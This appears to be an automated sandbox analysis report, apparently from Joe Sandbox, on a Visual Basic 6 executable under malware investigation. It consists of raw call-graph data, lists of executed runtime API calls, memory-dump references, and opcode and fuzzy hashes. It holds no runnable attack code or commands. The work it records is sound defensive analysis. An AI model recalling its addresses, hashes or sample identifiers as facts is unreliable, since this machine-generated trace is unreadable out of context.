__vbaI2I4 __vbaPut3 4584->4566 4584->4585 4585->4566 4585->4582 4585->4584 4587 411978 6 API calls 4585->4587 4589 411ad1 4586->4589 4587->4585 4588 411bdb 11 API calls 4588->4570 4589->4566 4589->4588 4590 411aff __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 4589->4590 4591 411bc9 #598 4589->4591 4592 411b70 6 API calls 4589->4592 4590->4566 4590->4589 4591->4589 4592->4591 4594 404d50 4593->4594 4595 410804 __vbaSetSystemError __vbaRecUniToAnsi 4594->4595 4662 404dc4 4595->4662 4664 40538c 4611->4664 4666 405b6c 4615->4666 4661 404d59 4660->4661 4663 404dcd 4662->4663 4665 405395 4664->4665 4667 405b75 4666->4667 5864 415601 __vbaFreeVar 5865 40c700 __vbaChkstk __vbaOnError 5866 40cc00 5865->5866 5867 40c76a 5865->5867 5868 40cc42 __vbaErrorOverflow 5866->5868 5869 40c78f __vbaHresultCheckObj 5867->5869 5871 40c7af 5867->5871 5870 40cc50 __vbaOnError 5868->5870 5869->5871 5872 40ccaa __vbaObjSet 5870->5872 5873 40cc9a __vbaNew2 5870->5873 5875 40c7f7 5871->5875 5876 40c7da __vbaHresultCheckObj 5871->5876 5877 40ccdc 5872->5877 5873->5872 5875->5868 5880 40c80d __vbaI2I4 __vbaFreeObj 5875->5880 5876->5875 5878 40ccf1 __vbaObjSet 5877->5878 5879 40cce2 __vbaHresultCheckObj 5877->5879 5882 40cd09 5878->5882 5879->5878 5881 40c858 5880->5881 5881->5866 5885 40c87f __vbaObjSet 5881->5885 5883 40cd1e __vbaFreeObjList __vbaExitProc 5882->5883 5884 40cd0f __vbaHresultCheckObj 5882->5884 5886 40cd56 5883->5886 5884->5883 5887 40c89d 5885->5887 5888 40c8c5 5887->5888 5889 40c8a8 __vbaHresultCheckObj 5887->5889 5888->5868 5890 40c8dd __vbaFreeObj 5888->5890 5889->5888 5891 40c8fd 5890->5891 5892 40c95c 5891->5892 5893 40c93c __vbaHresultCheckObj 5891->5893 5894 40c966 __vbaChkstk 5892->5894 5893->5894 5895 40c9ae 5894->5895 5896 40c9d6 5895->5896 5897 40c9b9 __vbaHresultCheckObj 5895->5897 5898 40c9e0 __vbaObjSet 5896->5898 5897->5898 5899 40ca18 __vbaFreeObjList 5898->5899 5900 40cbf4 5899->5900 5901 40ca47 5899->5901 5902 40ca8c 5901->5902 5903 40ca6c __vbaHresultCheckObj 5901->5903 5904 40ca96 __vbaChkstk 5902->5904 5903->5904 5905 40cade 5904->5905 5906 40cb0f __vbaObjSet 5905->5906 5907 40caef __vbaHresultCheckObj 5905->5907 5909 40cb6b 5906->5909 5907->5906 5910 40cb93 5909->5910 5911 40cb76 __vbaHresultCheckObj 5909->5911 5912 40cb9d __vbaChkstk __vbaLateIdCall __vbaFreeObjList __vbaFreeVar 5910->5912 5911->5912 5912->5900 6100 40b480 __vbaChkstk 6101 40b4d5 __vbaOnError 6100->6101 6102 40bf23 __vbaErrorOverflow 6101->6102 6103 40b503 6101->6103 6106 40bf30 __vbaChkstk 6102->6106 6104 40b521 __vbaLenBstr 6103->6104 6105 40be1b #580 __vbaStrToAnsi 6103->6105 6108 40b550 6104->6108 6109 40b841 __vbaLenBstr 6104->6109 6250 40556c 6105->6250 6110 40bf85 __vbaOnError 6106->6110 6108->6102 6112 40b569 __vbaInStr 6108->6112 6113 40bb90 __vbaLenBstr 6109->6113 6114 40b85c 6109->6114 6115 418b50 15 API calls 6110->6115 6118 40b599 __vbaLenBstr 6112->6118 6119 40b5b6 6112->6119 6113->6105 6116 40bbac __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 6113->6116 6114->6102 6114->6113 6123 40b88e __vbaInStr 6114->6123 6120 40bfbb 6115->6120 6121 40fba0 30 API calls 6116->6121 6118->6102 6118->6119 6122 40fba0 30 API calls 6119->6122 6124 418b50 15 API calls 6120->6124 6125 40bbfa __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 6121->6125 6126 40b5d0 __vbaStrCopy 6122->6126 6127 40b8e5 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 6123->6127 6128 40b8bf __vbaLenBstr 6123->6128 6131 40bfda 6124->6131 6132 410e60 12 API calls 6125->6132 6133 40ee70 24 API calls 6126->6133 6130 40fba0 30 API calls 6127->6130 6128->6102 6129 40b8dc 6128->6129 6129->6127 6134 40b933 __vbaFreeStrList 6130->6134 6135 418b50 15 API calls 6131->6135 6136 40bc66 __vbaFreeStrList 6132->6136 6137 40b5f4 __vbaStrMove 6133->6137 6134->6102 6138 40b96b 6134->6138 6139 40bff9 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 6135->6139 6136->6105 6140 40bc95 6136->6140 6137->6102 6141 40b61a 6137->6141 6138->6102 6144 40b99d 7 API calls 6138->6144 6142 418c90 20 API calls 6139->6142 6143 40fba0 30 API calls 6140->6143 6141->6102 6147 40b64c #631 __vbaStrMove __vbaStrCopy 6141->6147 6145 40c04c __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 6142->6145 6146 40bca6 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 6143->6146 6148 410e60 12 API calls 6144->6148 6149 418c90 20 API calls 6145->6149 6150 419150 113 API calls 6146->6150 6151 40ee70 24 API calls 6147->6151 6152 40ba2f __vbaFreeStrList __vbaFreeVar 6148->6152 6153 40c0b2 __vbaFreeStrList __vbaCastObj __vbaObjSet 6149->6153 6154 40bd05 __vbaFreeStrList 6150->6154 6155 40b685 8 API calls 6151->6155 6157 40ba78 6152->6157 6158 40bb59 6152->6158 6163 40c0f4 6153->6163 6154->6105 6159 40bd34 #580 __vbaLenBstr 6154->6159 6211 410e60 __vbaChkstk __vbaOnError __vbaStrToAnsi 6155->6211 6162 40fba0 30 API calls 6157->6162 6158->6102 6160 40bb72 __vbaInStr 6158->6160 6164 40bd61 6 API calls 6159->6164 6165 40bdd4 #600 6159->6165 6160->6113 6168 40ba89 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 6162->6168 6169 40c11f 6163->6169 6170 40c0ff __vbaHresultCheckObj 6163->6170 6171 40be04 __vbaStrCopy 6164->6171 6165->6171 6218 419150 11 API calls 6168->6218 6173 40c129 __vbaFreeObj __vbaNew __vbaObjSet 6169->6173 6170->6173 6171->6105 6178 40c15f 6173->6178 6177 40bae8 __vbaFreeStrList 6177->6158 6181 40bb13 #580 #600 6177->6181 6182 40c18a 6178->6182 6183 40c16a __vbaHresultCheckObj 6178->6183 6181->6158 6186 40c194 __vbaFreeObj 6182->6186 6183->6186 6187 40c1b3 __vbaStrCopy 6186->6187 6188 410fb0 18 API calls 6187->6188 6189 40c1d1 __vbaStrMove 6188->6189 6190 40ee70 24 API calls 6189->6190 6191 40c1e6 __vbaStrMove __vbaInStr __vbaFreeStrList 6190->6191 6192 40c229 __vbaStrCopy 6191->6192 6193 40c3cc __vbaStrCopy 6191->6193 6195 40ee70 24 API calls 6192->6195 6194 410fb0 18 API calls 6193->6194 6196 40c3ea __vbaStrMove 6194->6196 6197 40c24d 6 API calls 6195->6197 6198 40ee70 24 API calls 6196->6198 6199 40ee70 24 API calls 6197->6199 6200 40c3ff __vbaStrMove __vbaInStr __vbaFreeStrList 6198->6200 6201 40c2ad 15 API calls 6199->6201 6202 40c442 6200->6202 6203 40c675 6200->6203 6201->6203 6204 40c452 __vbaNew2 6202->6204 6205 40c46e 6202->6205 6204->6205 6206 40c4c4 6205->6206 6207 40c4a4 __vbaHresultCheckObj 6205->6207 6208 40c521 6206->6208 6209 40c4fe __vbaHresultCheckObj 6206->6209 6207->6206 6210 40c52b 20 API calls 6208->6210 6209->6210 6210->6203 6252 405338 6211->6252 6219 40ee70 24 API calls 6218->6219 6220 419240 __vbaStrMove 6219->6220 6221 40ee70 24 API calls 6220->6221 6222 419251 __vbaStrMove __vbaStrCmp __vbaFreeStrList 6221->6222 6223 419285 __vbaFileClose 6222->6223 6224 419298 __vbaGet3 __vbaLenBstr 6222->6224 6225 41968d __vbaExitProc 6223->6225 6226 4196ef __vbaErrorOverflow 6224->6226 6247 4192bc 6224->6247 6227 4196c2 __vbaFreeStr __vbaFreeStr __vbaFreeStr 6225->6227 6227->6177 6228 419652 __vbaFileClose __vbaExitProc 6228->6225 6228->6227 6229 4192e7 __vbaGet3 #525 __vbaStrMove __vbaGet3 __vbaGet3 6230 419347 6 API calls 6229->6230 6231 419337 __vbaStrCopy 6229->6231 6232 4193ac 6230->6232 6231->6230 6233 4193eb __vbaUI1I2 __vbaUI1I2 6232->6233 6235 4193c1 __vbaGenerateBoundsError 6232->6235 6236 4193c7 __vbaUI1I2 6232->6236 6254 419870 __vbaRedim __vbaRedim __vbaGetOwner3 6233->6254 6235->6236 6236->6226 6236->6232 6238 4195e3 __vbaFileClose 6238->6226 6238->6247 6240 419447 __vbaUI1I2 6240->6247 6241 41961e __vbaFileSeek 6241->6226 6241->6247 6242 418f30 17 API calls 6242->6247 6243 418e20 7 API calls 6243->6247 6244 419493 __vbaGenerateBoundsError 6244->6247 6245 4194b5 __vbaUI1I2 6245->6226 6246 4194d2 __vbaUI1I2 6245->6246 6246->6226 6246->6247 6247->6226 6247->6228 6247->6229 6247->6241 6247->6242 6247->6243 6247->6244 6247->6245 6248 41957b __vbaGenerateBoundsError 6247->6248 6249 4195a1 __vbaGenerateBoundsError 6247->6249 6255 418e20 6247->6255 6270 419700 6247->6270 6248->6247 6249->6247 6251 405575 6250->6251 6253 405341 6252->6253 6254->6247 6256 418f21 __vbaErrorOverflow 6255->6256 6257 418e35 6255->6257 6258 418e46 __vbaRedim __vbaGetOwner3 6257->6258 6259 418ec8 6257->6259 6260 418e88 6258->6260 6261 418eaa __vbaGenerateBoundsError 6258->6261 6262 418efc __vbaGenerateBoundsError 6259->6262 6264 418ed8 6259->6264 6260->6261 6263 418e8e 6260->6263 6268 418ea6 6261->6268 6266 418ef8 6262->6266 6263->6268 6269 418e9a __vbaGenerateBoundsError 6263->6269 6265 418ee6 __vbaGenerateBoundsError 6264->6265 6264->6266 6265->6266 6266->6256 6267 418f16 6266->6267 6267->6240 6268->6240 6269->6268 6271 419741 6270->6271 6272 419828 __vbaAryDestruct 6270->6272 6273 419860 __vbaErrorOverflow 6271->6273 6274 41974b __vbaRedim __vbaAryLock 6271->6274 6272->6238 6276 41979f __vbaGenerateBoundsError 6274->6276 6277 41977e 6274->6277 6279 4197aa __vbaAryLock 6276->6279 6277->6276 6278 419784 6277->6278 6280 419796 __vbaGenerateBoundsError 6278->6280 6281 419798 6278->6281 6282 4197d6 __vbaGenerateBoundsError 6279->6282 6283 4197bb 6279->6283 6280->6281 6281->6279 6284 4197d2 6282->6284 6283->6282 6285 4197c1 6283->6285 6287 4197f9 __vbaSetSystemError __vbaAryUnlock __vbaAryUnlock __vbaPutOwner3 6284->6287 6285->6284 6286 4197cd __vbaGenerateBoundsError 6285->6286 6286->6284 6287->6272 6288 40fd80 __vbaFreeStrList __vbaFreeVarList 6289 40e780 6290 40e7ba __vbaOnError __vbaCastObj __vbaObjSet 6289->6290 6291 40e7e6 6290->6291 6292 40e7ec __vbaHresultCheckObj 6291->6292 6293 40e7fe __vbaFreeObj __vbaExitProc 6291->6293 6292->6293 6294 40e81e 6293->6294 5913 40ae04 __vbaFreeStrList 5914 40b405 __vbaFreeStrList __vbaFreeVar 5915 40e306 __vbaFreeObj 5916 40cc07 __vbaFreeObjList __vbaFreeVar 6300 415c8a __vbaI2I4 __vbaFileClose __vbaI2I4 __vbaFileClose __vbaExitProc 6301 415ce0 6 API calls 6300->6301 4680 40290c #100 4681 402933 4680->4681 4681->4681 5917 41910c __vbaAryUnlock __vbaAryUnlock 5918 40480f 5919 40bf30 __vbaChkstk 5918->5919 5920 40bf85 __vbaOnError 5919->5920 5963 418b50 __vbaChkstk __vbaStrCopy __vbaStrCopy __vbaOnError __vbaStrToAnsi 5920->5963 5964 405dd8 5963->5964 5965 418bdf __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr __vbaStrToAnsi 5964->5965 5971 405e68 5965->5971 5972 405e71 5971->5972 5973 40ab10 __vbaFreeStrList __vbaFreeObj __vbaFreeVarList 5976 40cf19 __vbaFreeObjList __vbaFreeVarList 5977 40e51b __vbaFreeStrList __vbaFreeObj 6305 41679a __vbaAryUnlock 6306 40aca0 __vbaChkstk 6307 40acf5 __vbaOnError 6306->6307 6308 40ad2a __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 6307->6308 6309 40ad1b 6307->6309 6310 418c90 20 API calls 6308->6310 6309->6308 6311 40ad7d __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 6310->6311 6312 418c90 20 API calls 6311->6312 6313 40ade3 __vbaFreeStrList 6312->6313 6314 40ae18 6313->6314 6315 40e6a0 6316 40e6e5 __vbaOnError __vbaCastObj __vbaObjSet 6315->6316 6317 40e711 6316->6317 6318 40e717 __vbaHresultCheckObj 6317->6318 6319 40e729 __vbaFreeObj __vbaRaiseEvent __vbaExitProc 6317->6319 6318->6319 6320 40e756 6319->6320 5979 40ff26 5980 40ff35 __vbaFreeStrList __vbaFreeVar 5979->5980 5981 40ff2c __vbaFreeStr 5979->5981 5981->5980 5982 404829 5983 40cc50 __vbaOnError 5982->5983 5984 40ccaa __vbaObjSet 5983->5984 5985 40cc9a __vbaNew2 5983->5985 5987 40ccdc 5984->5987 5985->5984 5988 40ccf1 __vbaObjSet 5987->5988 5989 40cce2 __vbaHresultCheckObj 5987->5989 5990 40cd09 5988->5990 5989->5988 5991 40cd1e __vbaFreeObjList __vbaExitProc 5990->5991 5992 40cd0f __vbaHresultCheckObj 5990->5992 5993 40cd56 5991->5993 5992->5991 5999 40e138 __vbaFreeStrList __vbaFreeObjList __vbaFreeVar 6000 41003a 6001 410040 __vbaFreeStr 6000->6001 6002 410049 __vbaFreeStr 6000->6002 6001->6002 6003 40ea3b 6004 40ea45 __vbaFreeStr 6003->6004 6005 40ea4e __vbaFreeStrList 6003->6005 6004->6005 6006 40cd3e __vbaFreeObjList

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 00410180 Relevance: 52.7, APIs: 35, Instructions: 220COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
                                                                                                                                                                                  • __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
                                                                                                                                                                                  • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
                                                                                                                                                                                  • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
                                                                                                                                                                                  • #525.MSVBVM60(00000104), ref: 0041029C
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004102A7
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
                                                                                                                                                                                  • #616.MSVBVM60(?,?,?,00000000), ref: 00410399
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
                                                                                                                                                                                  • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
                                                                                                                                                                                  • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9
                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 004104ED
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00410538
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00410544
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$Free$AnsiMoveSystem$#525#616BoundsBstrChangeChkstkCloseConstruct2CopyDestructFindGenerateListNotificationUnicode
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1228785046-0
                                                                                                                                                                                  • Opcode ID: 0e7fc902b34ffcf9e67cdb1769bf0c1f0fb471222fd1f6da1b4fc70dbbb803ea
                                                                                                                                                                                  • Instruction ID: ed4df61ca57589e4cb6a89f15fcf2a92bf343cb87a1231b53511e749ac9c114a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e7fc902b34ffcf9e67cdb1769bf0c1f0fb471222fd1f6da1b4fc70dbbb803ea
                                                                                                                                                                                  • Instruction Fuzzy Hash: D9A13EB5901218DFDB14DFA0DE4DBDEB7B4BB48304F1081A9E50AB72A0DB745A84CF54
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00408C50 Relevance: 670.6, APIs: 377, Strings: 5, Instructions: 2055COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 0 408c50-408d9c call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList 10 408da2-409172 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 0->10 11 4091be-4091da __vbaStrCmp 0->11 52 409177-4091b9 __vbaFreeStrList 10->52 13 4091e0-409209 call 4125a0 11->13 14 40948c-4094a8 __vbaStrCmp 11->14 26 40924b-409296 __vbaStrCat #600 __vbaFreeVar 13->26 27 40920b-409245 call 40fba0 call 415660 #580 13->27 16 409b34-409b6f __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy call 40ee70 14->16 17 4094ae-4094c7 call 4125a0 14->17 40 409b74-409c67 __vbaStrMove * 3 #690 __vbaFreeStrList #537 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 411590 16->40 31 409509-409582 __vbaStrCat #600 __vbaFreeVar __vbaNew __vbaObjSet 17->31 32 4094c9-409503 call 40fba0 call 415660 #580 17->32 28 409298-4092a4 call 404c14 __vbaSetSystemError 26->28 29 4092aa-40933d __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaObjSet 26->29 27->26 28->29 68 409362 29->68 69 40933f-409360 __vbaHresultCheckObj 29->69 49 409584-4095a5 __vbaHresultCheckObj 31->49 50 4095a7 31->50 32->31 48 409c6c-409c97 __vbaFreeStrList 40->48 54 409c99-409ca6 __vbaEnd 48->54 55 409cab-409cc4 call 4125a0 48->55 56 4095b1-409646 __vbaFreeObj __vbaStrCopy call 410fb0 __vbaStrMove call 40ee70 __vbaStrMove __vbaInStr __vbaFreeStrList 49->56 50->56 59 409dec-409ee3 __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy call 40ee70 __vbaStrMove * 3 #690 __vbaFreeStrList #600 __vbaEnd 54->59 55->59 66 409cca-409ce4 #535 55->66 87 4097e2-409858 __vbaStrCopy call 410fb0 __vbaStrMove call 40ee70 __vbaStrMove __vbaInStr __vbaFreeStrList 56->87 88 40964c-4097dd __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove #611 #661 #705 __vbaStrMove * 3 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat #600 __vbaFreeStrList __vbaFreeVarList 56->88 80 409ee9-40a26c __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 418c90 __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 418c90 __vbaFreeStrList call 418a10 * 2 __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList 59->80 72 40aba7 66->72 73 409cea-409db1 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 __vbaFreeStrList call 40fba0 #598 call 415660 66->73 70 40936c-4093ff __vbaFreeObj __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410780 __vbaFreeStrList 68->70 69->70 83 409405-409481 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat #600 __vbaFreeStrList __vbaFreeVar 70->83 84 409487 70->84 72->72 103 409db3 73->103 104 409db5-409dd0 #535 __vbaFpR4 73->104 143 40a272-40a2b9 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 80->143 144 40aa5b-40aa71 call 40f1d0 80->144 83->84 84->80 106 409aad-409af7 __vbaObjSet 87->106 107 40985e-40986c 87->107 88->106 109 409dd6-409de6 #580 103->109 104->73 104->109 121 409af9-409b1a __vbaHresultCheckObj 106->121 122 409b1c 106->122 110 40988a 107->110 111 40986e-409888 __vbaNew2 107->111 109->59 114 409894-4098c7 110->114 111->114 123 4098c9-4098ea __vbaHresultCheckObj 114->123 124 4098ec 114->124 126 409b26-409b2f __vbaFreeObj 121->126 122->126 127 4098f6-409924 123->127 124->127 126->80 132 409926-409947 __vbaHresultCheckObj 127->132 133 409949 127->133 134 409953-409aaa #611 #661 #705 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove * 2 __vbaStrCat __vbaStrMove __vbaStrCat #600 __vbaFreeStrList __vbaFreeObj __vbaFreeVarList 132->134 133->134 134->106 149 40a329-40a370 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 143->149 150 40a2bb-40a323 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 143->150 151 40aa73-40aa7a call 40f1a0 144->151 152 40aa7f-40aac9 __vbaObjSet 144->152 157 40a3e0-40a427 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 149->157 158 40a372-40a3da __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 149->158 150->149 151->152 161 40aacb-40aaec __vbaHresultCheckObj 152->161 162 40aaee 152->162 165 40a497-40a4de __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 157->165 166 40a429-40a491 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 157->166 158->157 164 40aaf8-40ab84 __vbaFreeObj __vbaFreeStr * 2 161->164 162->164 170 40a4e0-40a548 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 165->170 171 40a54e-40a595 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 165->171 166->165 170->171 174 40a605-40a64c __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 171->174 175 40a597-40a5ff __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 171->175 178 40a6bc-40a703 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 174->178 179 40a64e-40a6b6 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 174->179 175->174 182 40a773-40a7ba __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 178->182 183 40a705-40a76d __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 178->183 179->178 186 40a82a-40a871 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 182->186 187 40a7bc-40a824 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 182->187 183->182 190 40a8e1-40a928 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 186->190 191 40a873-40a8db __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 186->191 187->186 194 40a998-40a9df __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 190->194 195 40a92a-40a992 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 190->195 191->190 198 40a9e1-40aa49 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 194->198 199 40aa4f-40aa56 194->199 195->194 198->199
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
